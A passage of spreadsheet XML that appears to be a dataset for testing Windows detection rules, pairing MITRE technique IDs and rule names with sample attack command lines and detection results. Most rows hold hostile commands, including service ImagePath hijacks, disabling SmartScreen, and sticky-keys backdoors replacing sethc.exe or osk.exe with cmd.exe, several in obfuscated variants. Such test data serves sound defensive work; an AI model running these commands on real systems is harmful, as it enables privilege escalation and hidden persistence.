      <c r="C267" s="43" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation via Service Permissions Weakness</t>
        </is>
      </c>
      <c r="D267" s="43" t="inlineStr">
        <is>
          <t>0f9c21f1-6a73-4b0e-9809-cb562cb8d981</t>
        </is>
      </c>
      <c r="E267" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\LegitService" /v "ImagePath" /t REG_EXPAND_SZ /d "malicious.exe" /f</t>
        </is>
      </c>
      <c r="F267" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G267" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H267" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I267" s="43" t="n"/>
      <c r="J267" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K267" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="268" ht="15.75" customHeight="1" s="42">
      <c r="A268" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B268" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_privilege_escalation_via_service_key</t>
        </is>
      </c>
      <c r="C268" s="43" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation via Service Permissions Weakness</t>
        </is>
      </c>
      <c r="D268" s="43" t="inlineStr">
        <is>
          <t>0f9c21f1-6a73-4b0e-9809-cb562cb8d981</t>
        </is>
      </c>
      <c r="E268" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\LegitService" ^/v "ImagePath" ^/t REG_EXPAND_SZ ^/d "malicious.exe" ^/f</t>
        </is>
      </c>
      <c r="F268" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G268" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H268" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I268" s="43" t="n"/>
      <c r="J268" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K268" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="269" ht="15.75" customHeight="1" s="42">
      <c r="A269" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B269" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_privilege_escalation_via_service_key</t>
        </is>
      </c>
      <c r="C269" s="43" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation via Service Permissions Weakness</t>
        </is>
      </c>
      <c r="D269" s="43" t="inlineStr">
        <is>
          <t>0f9c21f1-6a73-4b0e-9809-cb562cb8d981</t>
        </is>
      </c>
      <c r="E269" s="43" t="inlineStr">
        <is>
          <t>reg.exe add HKLM\\SYSTEM\\CurrentControlSet\\Services\\LegitService /v ImagePath /t REG_EXPAND_SZ /d malicious.exe /f</t>
        </is>
      </c>
      <c r="F269" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G269" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H269" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I269" s="43" t="n"/>
      <c r="J269" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K269" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="270" ht="15.75" customHeight="1" s="42">
      <c r="A270" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B270" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_privilege_escalation_via_service_key</t>
        </is>
      </c>
      <c r="C270" s="43" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation via Service Permissions Weakness</t>
        </is>
      </c>
      <c r="D270" s="43" t="inlineStr">
        <is>
          <t>0f9c21f1-6a73-4b0e-9809-cb562cb8d981</t>
        </is>
      </c>
      <c r="E270" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\LegitService" /v "Image"+"Path" /t REG_EXPAND_SZ /d "malicious.exe" /f</t>
        </is>
      </c>
      <c r="F270" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G270" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H270" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I270" s="43" t="n"/>
      <c r="J270" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K270" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="271" ht="15.75" customHeight="1" s="42">
      <c r="A271" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B271" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_privilege_escalation_via_service_key</t>
        </is>
      </c>
      <c r="C271" s="43" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation via Service Permissions Weakness</t>
        </is>
      </c>
      <c r="D271" s="43" t="inlineStr">
        <is>
          <t>0f9c21f1-6a73-4b0e-9809-cb562cb8d981</t>
        </is>
      </c>
      <c r="E271" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\LegitService" /v ImagePath /t REG_EXPAND_SZ /d malicious.exe /f</t>
        </is>
      </c>
      <c r="F271" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G271" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H271" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I271" s="43" t="n"/>
      <c r="J271" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K271" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="272" ht="15.75" customHeight="1" s="42">
      <c r="A272" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B272" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C272" s="43" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D272" s="43" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E272" s="43" t="inlineStr">
        <is>
          <t>sc.exe  config   "WeakService"   BINPATH=   "mal.exe"</t>
        </is>
      </c>
      <c r="F272" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G272" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H272" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I272" s="43" t="n"/>
      <c r="J272" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K272" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="273" ht="15.75" customHeight="1" s="42">
      <c r="A273" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B273" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C273" s="43" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D273" s="43" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E273" s="43" t="inlineStr">
        <is>
          <t>sc.exe config WeakService binPath= "mal.exe"</t>
        </is>
      </c>
      <c r="F273" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G273" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H273" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I273" s="43" t="n"/>
      <c r="J273" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K273" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="274" ht="15.75" customHeight="1" s="42">
      <c r="A274" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B274" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C274" s="43" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D274" s="43" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E274" s="43" t="inlineStr">
        <is>
          <t>sc.exe config WeakService BINPATH=mal.exe</t>
        </is>
      </c>
      <c r="F274" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G274" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H274" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I274" s="43" t="n"/>
      <c r="J274" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K274" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="275" ht="15.75" customHeight="1" s="42">
      <c r="A275" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B275" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C275" s="43" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D275" s="43" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E275" s="43" t="inlineStr">
        <is>
          <t>sc.exe config WeakService "BINPATH=mal.exe"</t>
        </is>
      </c>
      <c r="F275" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G275" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H275" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I275" s="43" t="n"/>
      <c r="J275" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K275" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="276" ht="15.75" customHeight="1" s="42">
      <c r="A276" s="43" t="inlineStr">
        <is>
          <t>t1484.001</t>
        </is>
      </c>
      <c r="B276" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_modify_group_policy_settings</t>
        </is>
      </c>
      <c r="C276" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings</t>
        </is>
      </c>
      <c r="D276" s="43" t="inlineStr">
        <is>
          <t>ada4b0c4-758b-46ac-9033-9004613a150d</t>
        </is>
      </c>
      <c r="E276" s="43" t="inlineStr">
        <is>
          <t>reg add HKLM\"SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F276" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G276" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H276" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I276" s="43" t="n"/>
      <c r="J276" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K276" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="277" ht="15.75" customHeight="1" s="42">
      <c r="A277" s="43" t="inlineStr">
        <is>
          <t>t1484.001</t>
        </is>
      </c>
      <c r="B277" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_modify_group_policy_settings</t>
        </is>
      </c>
      <c r="C277" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings</t>
        </is>
      </c>
      <c r="D277" s="43" t="inlineStr">
        <is>
          <t>ada4b0c4-758b-46ac-9033-9004613a150d</t>
        </is>
      </c>
      <c r="E277" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System" /v GroupPolicyRefreshTimeDC /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F277" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G277" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H277" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I277" s="43" t="n"/>
      <c r="J277" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K277" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="278" ht="15.75" customHeight="1" s="42">
      <c r="A278" s="43" t="inlineStr">
        <is>
          <t>t1546.002</t>
        </is>
      </c>
      <c r="B278" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_screensaver</t>
        </is>
      </c>
      <c r="C278" s="43" t="inlineStr">
        <is>
          <t>Suspicious ScreenSave Change by Reg.exe</t>
        </is>
      </c>
      <c r="D278" s="43" t="inlineStr">
        <is>
          <t>0fc35fc3-efe6-4898-8a37-0b233339524f</t>
        </is>
      </c>
      <c r="E278" s="43" t="inlineStr">
        <is>
          <t>reg add HKCU\Control Panel\Desktop /v SCRNSAVE.EXE /t REG_SZ /d calc.exe /f</t>
        </is>
      </c>
      <c r="F278" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G278" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H278" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I278" s="43" t="n"/>
      <c r="J278" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K278" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="279" ht="15.75" customHeight="1" s="42">
      <c r="A279" s="43" t="inlineStr">
        <is>
          <t>t1053.002</t>
        </is>
      </c>
      <c r="B279" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_at_interactive_execution</t>
        </is>
      </c>
      <c r="C279" s="43" t="inlineStr">
        <is>
          <t>Interactive AT Job</t>
        </is>
      </c>
      <c r="D279" s="43" t="inlineStr">
        <is>
          <t>60fc936d-2eb0-4543-8a13-911c750a1dfc</t>
        </is>
      </c>
      <c r="E279" s="43" t="inlineStr">
        <is>
          <t>at 13:20 /i cmd</t>
        </is>
      </c>
      <c r="F279" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G279" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H279" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I279" s="43" t="n"/>
      <c r="J279" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K279" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="280" ht="15.75" customHeight="1" s="42">
      <c r="A280" s="43" t="inlineStr">
        <is>
          <t>t1053.002</t>
        </is>
      </c>
      <c r="B280" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_at_interactive_execution</t>
        </is>
      </c>
      <c r="C280" s="43" t="inlineStr">
        <is>
          <t>Interactive AT Job</t>
        </is>
      </c>
      <c r="D280" s="43" t="inlineStr">
        <is>
          <t>60fc936d-2eb0-4543-8a13-911c750a1dfc</t>
        </is>
      </c>
      <c r="E280" s="43" t="inlineStr">
        <is>
          <t>at 13:20   /interactive   cmd</t>
        </is>
      </c>
      <c r="F280" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G280" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H280" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I280" s="43" t="n"/>
      <c r="J280" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K280" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="281" ht="15.75" customHeight="1" s="42">
      <c r="A281" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B281" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_wsudo_susp_execution</t>
        </is>
      </c>
      <c r="C281" s="43" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution</t>
        </is>
      </c>
      <c r="D281" s="43" t="inlineStr">
        <is>
          <t>bdeeabc9-ff2a-4a51-be59-bb253aac7891</t>
        </is>
      </c>
      <c r="E281" s="43" t="inlineStr">
        <is>
          <t>sysupdate.exe -u System cmd.exe</t>
        </is>
      </c>
      <c r="F281" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G281" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H281" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I281" s="43" t="n"/>
      <c r="J281" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K281" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="282" ht="15.75" customHeight="1" s="42">
      <c r="A282" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B282" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_wsudo_susp_execution</t>
        </is>
      </c>
      <c r="C282" s="43" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution</t>
        </is>
      </c>
      <c r="D282" s="43" t="inlineStr">
        <is>
          <t>bdeeabc9-ff2a-4a51-be59-bb253aac7891</t>
        </is>
      </c>
      <c r="E282" s="43" t="inlineStr">
        <is>
          <t>sysupdate.exe -uTrustedInstaller cmd.exe</t>
        </is>
      </c>
      <c r="F282" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G282" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H282" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I282" s="43" t="n"/>
      <c r="J282" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K282" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="283" ht="15.75" customHeight="1" s="42">
      <c r="A283" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B283" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_wsudo_susp_execution</t>
        </is>
      </c>
      <c r="C283" s="43" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution</t>
        </is>
      </c>
      <c r="D283" s="43" t="inlineStr">
        <is>
          <t>bdeeabc9-ff2a-4a51-be59-bb253aac7891</t>
        </is>
      </c>
      <c r="E283" s="43" t="inlineStr">
        <is>
          <t>sysupdate.exe --ti cmd.exe</t>
        </is>
      </c>
      <c r="F283" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G283" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H283" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I283" s="43" t="n"/>
      <c r="J283" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K283" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="284" ht="15.75" customHeight="1" s="42">
      <c r="A284" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B284" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_osk_cmd</t>
        </is>
      </c>
      <c r="C284" s="43" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd</t>
        </is>
      </c>
      <c r="D284" s="43" t="inlineStr">
        <is>
          <t>e9b61244-893f-427c-b287-3e708f321c6b</t>
        </is>
      </c>
      <c r="E284" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "mklink C:\Windows\System32\osk.exe C:\Windows\System32\cmd.exe"</t>
        </is>
      </c>
      <c r="F284" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G284" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H284" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I284" s="43" t="n"/>
      <c r="J284" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K284" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="285" ht="15.75" customHeight="1" s="42">
      <c r="A285" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B285" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_osk_cmd</t>
        </is>
      </c>
      <c r="C285" s="43" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd</t>
        </is>
      </c>
      <c r="D285" s="43" t="inlineStr">
        <is>
          <t>e9b61244-893f-427c-b287-3e708f321c6b</t>
        </is>
      </c>
      <c r="E285" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "mklink /D C:\\Windows\\System32\\osk.exe C:\\Windows\\System32\\cmd.exe"</t>
        </is>
      </c>
      <c r="F285" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G285" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H285" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I285" s="43" t="n"/>
      <c r="J285" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K285" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="286" ht="15.75" customHeight="1" s="42">
      <c r="A286" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B286" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_osk_cmd</t>
        </is>
      </c>
      <c r="C286" s="43" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd</t>
        </is>
      </c>
      <c r="D286" s="43" t="inlineStr">
        <is>
          <t>e9b61244-893f-427c-b287-3e708f321c6b</t>
        </is>
      </c>
      <c r="E286" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "New-Item -ItemType SymbolicLink -Path 'C:\\Windows\\System32\\osk.exe' -Target 'C:\\Windows\\System32\\cmd.exe' -Force"</t>
        </is>
      </c>
      <c r="F286" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G286" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H286" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I286" s="43" t="n"/>
      <c r="J286" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K286" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="287" ht="15.75" customHeight="1" s="42">
      <c r="A287" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B287" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_sticky_key_like_backdoor_execution</t>
        </is>
      </c>
      <c r="C287" s="43" t="inlineStr">
        <is>
          <t>Sticky Key Like Backdoor Execution</t>
        </is>
      </c>
      <c r="D287" s="43" t="inlineStr">
        <is>
          <t>2fdefcb3-dbda-401e-ae23-f0db027628bc</t>
        </is>
      </c>
      <c r="E287" s="43" t="inlineStr">
        <is>
          <t>cmd.exe ^"sethc.exe^"</t>
        </is>
      </c>
      <c r="F287" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G287" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H287" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I287" s="43" t="n"/>
      <c r="J287" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K287" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="288" ht="15.75" customHeight="1" s="42">
      <c r="A288" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B288" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_sticky_key_like_backdoor_execution</t>
        </is>
      </c>
      <c r="C288" s="43" t="inlineStr">
        <is>
          <t>Sticky Key Like Backdoor Execution</t>
        </is>
      </c>
      <c r="D288" s="43" t="inlineStr">
        <is>
          <t>2fdefcb3-dbda-401e-ae23-f0db027628bc</t>
        </is>
      </c>
      <c r="E288" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" "sethc.exe"</t>
        </is>
      </c>
      <c r="F288" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G288" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H288" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I288" s="43" t="n"/>
      <c r="J288" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K288" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="289" ht="15.75" customHeight="1" s="42">
      <c r="A289" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B289" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_sticky_key_like_backdoor_execution</t>
        </is>
      </c>
      <c r="C289" s="43" t="inlineStr">
        <is>
          <t>Sticky Key Like Backdoor Execution</t>
        </is>
      </c>
      <c r="D289" s="43" t="inlineStr">
        <is>
          <t>2fdefcb3-dbda-401e-ae23-f0db027628bc</t>
        </is>
      </c>
      <c r="E289" s="43" t="inlineStr">
        <is>
          <t>cmd.exe sethc.exe</t>
        </is>
      </c>
      <c r="F289" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G289" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H289" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I289" s="43" t="n"/>
      <c r="J289" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K289" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="290" ht="15.75" customHeight="1" s="42">
      <c r="A290" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B290" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_sticky_key_like_backdoor_execution</t>
        </is>
      </c>
      <c r="C290" s="43" t="inlineStr">
        <is>
          <t>Sticky Key Like Backdoor Execution</t>
        </is>
      </c>
      <c r="D290" s="43" t="inlineStr">
        <is>
          <t>2fdefcb3-dbda-401e-ae23-f0db027628bc</t>
        </is>
      </c>
      <c r="E290" s="43" t="inlineStr">
        <is>
          <t>cmd.exe %VARIABLE% where VARIABLE=sethc.exe</t>
        </is>
      </c>
      <c r="F290" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G290" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H290" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I290" s="43" t="n"/>
      <c r="J290" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K290" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="291" ht="15.75" customHeight="1" s="42">
      <c r="A291" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B291" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_sticky_keys_replace</t>
        </is>
      </c>
      <c r="C291" s="43" t="inlineStr">
        <is>
          <t>Persistence Via Sticky Key Backdoor</t>
        </is>
      </c>
      <c r="D291" s="43" t="inlineStr">
        <is>
          <t>1070db9a-3e5d-412e-8e7b-7183b616e1b3</t>
        </is>
      </c>
      <c r="E291" s="43" t="inlineStr">
        <is>
          <t>copy /y cmd.exe sethc.exe</t>
        </is>
      </c>
      <c r="F291" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G291" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H291" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I291" s="43" t="n"/>
      <c r="J291" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K291" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="292" ht="15.75" customHeight="1" s="42">
      <c r="A292" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B292" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_sticky_keys_replace</t>
        </is>
      </c>
      <c r="C292" s="43" t="inlineStr">
        <is>
          <t>Persistence Via Sticky Key Backdoor</t>
        </is>
      </c>
      <c r="D292" s="43" t="inlineStr">
        <is>
          <t>1070db9a-3e5d-412e-8e7b-7183b616e1b3</t>
        </is>
      </c>
      <c r="E292" s="43" t="inlineStr">
        <is>
          <t>copy /y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe</t>
        </is>
      </c>
      <c r="F292" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G292" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H292" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I292" s="43" t="n"/>
      <c r="J292" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K292" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="293" ht="15.75" customHeight="1" s="42">
      <c r="A293" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B293" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_sticky_keys_replace</t>
        </is>
      </c>
      <c r="C293" s="43" t="inlineStr">
        <is>
          <t>Persistence Via Sticky Key Backdoor</t>
        </is>
      </c>
      <c r="D293" s="43" t="inlineStr">
        <is>
          <t>1070db9a-3e5d-412e-8e7b-7183b616e1b3</t>
        </is>
      </c>
      <c r="E293" s="43" t="inlineStr">
        <is>
          <t>copy /y cmd.exe  sethc.exe</t>
        </is>
      </c>
      <c r="F293" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G293" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H293" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I293" s="43" t="n"/>
      <c r="J293" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K293" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="294" ht="15.75" customHeight="1" s="42">
      <c r="A294" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B294" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_sticky_keys_replace</t>
        </is>
      </c>
      <c r="C294" s="43" t="inlineStr">
        <is>
          <t>Persistence Via Sticky Key Backdoor</t>
        </is>
      </c>
      <c r="D294" s="43" t="inlineStr">
        <is>
          <t>1070db9a-3e5d-412e-8e7b-7183b616e1b3</t>
        </is>
      </c>
      <c r="E294" s="43" t="inlineStr">
        <is>
          <t>copy /y cmd.exe" sethc.exe</t>
        </is>
      </c>
      <c r="F294" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G294" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H294" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I294" s="43" t="n"/>
      <c r="J294" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K294" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="295" ht="15.75" customHeight="1" s="42">
      <c r="A295" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B295" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_install_reg_debugger_backdoor</t>
        </is>
      </c>
      <c r="C295" s="43" t="inlineStr">
        <is>
